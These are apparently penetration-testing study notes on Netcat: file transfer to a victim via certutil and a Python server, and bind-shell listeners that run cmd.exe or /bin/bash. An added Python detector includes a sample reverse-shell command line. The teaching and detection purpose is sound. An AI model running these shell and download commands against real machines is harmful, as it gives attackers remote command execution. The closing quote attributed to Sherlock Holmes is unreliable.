# Bind & Reverse Shells

## Netcat Fundamentals

* Netcat (a.k.a. the TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.
* Netcat is available for both \*NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.
* Netcat utilizes a client-server communication architecture with two modes:
  * Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).
  * Server mode - Netcat can be used to listen for connections from clients on a specific port.
* Penetration testers can use Netcat for the following tasks:
  * Banner Grabbing
  * Port Scanning
  * Transferring Files
  * Bind/Reverse Shells

## **Usage of Netcat**

The `/usr/share/windows-binaries` folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.

### Transferring Files from Kali Linux to Windows

#### **Using Python HTTP Server and Certutil**

1. **Prepare Files:**
   * Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.
2. **Host File on Python Server:**
   * Start a Python HTTP server:

     ```bash
     python3 -m http.server
     ```
   * Files can now be accessed via `http://<your_ip>:8000/<filename>`.
3. **Download on Windows Using Certutil:**
   * On the victim's Windows machine:

     ```bash
     certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>
     ```

#### **Using Netcat (nc) for Direct Transfer**

1. **Setup Netcat on Windows:**
   * Receive files using Netcat:

     ```bash
     nc.exe -nvlp 1234 > <output-file-name>
     ```
2. **Send File from Kali Linux:**
   * Send file from Kali Linux to Windows:

     ```bash
     nc -nv <win_ip> 1234 < <file-to-share>
     ```
   * Replace `<win_ip>` with the Windows machine's IP address.

## Bind Shells

* A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.
* A Netcat listener can be set up to execute a specific executable, such as `cmd.exe` or `/bin/bash`, when a client connects to the listener.

<figure><img src="https://3226903849-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaKwXOzYgG7jDDDoVkYvX%2Fuploads%2FpTB4trmCeNBm3tLftpng%2FBind%20Shells.png?alt=media&#x26;token=8423596f-0de3-4c2a-98e2-e5c485aed360" alt=""><figcaption><p>Bind Shells</p></figcaption></figure>

## Setting Up Bind Shells

### **Windows System**

* **Establish Bind Shell:**

  ```bash
  nc.exe -nvlp 1234 -e cmd.exe
  ```

  This command starts a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-e`) `cmd.exe` upon connection, creating a bind shell.
* **Connect from Linux:**

  ```bash
  nc -nv <win_ip> <port>
  ```

  Replace `<win_ip>` with the IP address of the Windows machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

### **Linux System**

* **Establish Bind Shell:**

  ```bash
  nc -nvlp 1234 -c /bin/bash
  ```

  This command sets up a Netcat listener (`-l`) on port 1234 (`-p 1234`) and executes (`-c`) `/bin/bash` upon connection, creating a bind shell.
* **Connect from Windows:**

  ```bash
  nc.exe -nv <linux_ip> <port>
  ```

  Replace `<linux_ip>` with the IP address of the Linux machine hosting the bind shell, and `<port>` with the port number (1234 in this example).

## Reverse Shells

* A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

<figure><img src="https://3226903849-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaKwXOzYgG7jDDDoVkYvX%2Fuploads%2F8gIGj4Sk3kMfgNrjV05e%2FReverse%20Shells.png?alt=media&#x26;token=bef067ef-5d1a-47d4-a2fb-e39c18ac3041" alt=""><figcaption><p>Reverse Shells</p></figcaption></figure>
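
From the defender's side, the bind-shell listeners shown earlier and the reverse-shell pattern defined here both appear in process-creation logs as a Netcat process started with an exec option. The following is an added example, not part of the original page: it classifies command lines by whether the exec option is combined with a listener. The option table, host names and sample records are assumptions constructed for illustration.

```python
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
# Short options that consume a value (assumed from traditional netcat and ncat).
VALUE_OPTS = set("ecgGimopqswTx")

def classify(cmdline):
    """Return 'bind-shell', 'reverse-shell' or None for one command line."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes
    except ValueError:                             # unbalanced quotes in the log
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    listening = has_exec = skip = False
    for arg in argv[1:]:
        if skip:                                   # value of the previous option
            skip = False
        elif arg in ("--exec", "--sh-exec"):       # ncat long forms of -e / -c
            has_exec, skip = True, True
        elif arg == "--listen":
            listening = True
        elif arg.startswith("-") and not arg.startswith("--"):
            for i, ch in enumerate(arg[1:], start=1):
                listening |= ch == "l"
                has_exec |= ch in "ec"
                if ch in VALUE_OPTS:               # rest of cluster or next arg is its value
                    skip = i == len(arg) - 1
                    break
    if not has_exec:
        return None                                # plain client or file-transfer listener
    return "bind-shell" if listening else "reverse-shell"

# Constructed process-creation records (host, command line); hosts are hypothetical.
SAMPLE_EVENTS = [
    ("WIN-LAB01", r"C:\Tools\nc.exe -nvlp 1234 -e cmd.exe"),
    ("kali-lab", "nc -nvlp 1234 -c /bin/bash"),
    ("WIN-LAB01", "nc.exe -nvlp 1234"),
    ("kali-lab", "nc -nv 192.0.2.20 1234"),
    ("web-lab", "/usr/bin/ncat 192.0.2.10 4444 -e /bin/bash"),
    ("web-lab", "gcc -c main.c -o main.o"),
]

def scan(events):
    return [(host, kind, cmd) for host, cmd in events if (kind := classify(cmd))]
```

Netcat builds differ in which options they support, so check the option table against the binaries actually present in your environment before relying on the result.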

### Reverse Shell Cheatsheet

* [Reverse Shell Generator](https://www.revshells.com/)
* [Reverse Shell Cheatsheet - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

***

**Hacker's Mantra:** *Humiliation is the favorite currency of the hacker. - Sherlock Holmes*
